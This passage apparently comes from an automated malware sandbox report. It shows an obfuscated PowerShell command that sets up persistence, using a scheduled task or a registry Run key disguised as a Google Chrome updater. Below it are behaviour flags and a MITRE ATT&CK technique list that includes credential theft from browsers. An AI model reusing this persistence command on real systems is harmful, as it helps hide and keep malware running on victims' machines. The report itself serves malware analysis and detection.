    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2232
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery